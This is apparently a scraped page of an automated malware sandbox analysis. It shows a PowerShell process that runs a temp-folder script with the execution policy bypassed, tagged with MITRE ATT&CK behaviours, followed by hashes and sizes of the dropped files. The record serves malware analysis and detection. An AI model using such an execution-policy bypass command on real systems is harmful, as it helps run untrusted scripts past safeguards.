C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
948B
MD5721991167161c45d61b03e4dbad4984b
SHA1fd3fa85d142b5e8d4906d3e5bfe10c5347958457
SHA2560a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
SHA512f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
872B
MD5be76535391d1ca935bb0aa17049a88fe
SHA1628a2d3a643ef99890e8b13423b18f15e24a688e
SHA2562a4335b5e2fc635eaafbe1bca590bf1039aa4d451972158e255ce8f51c43b388
SHA5121ff39080dc566906af9d10fe66219a85811117879bde09e250e124b98cf88582a8dd1cd2d5297e6a431c251091d436d0f9473ff62dd8cbbe80e02e0b1dd822ce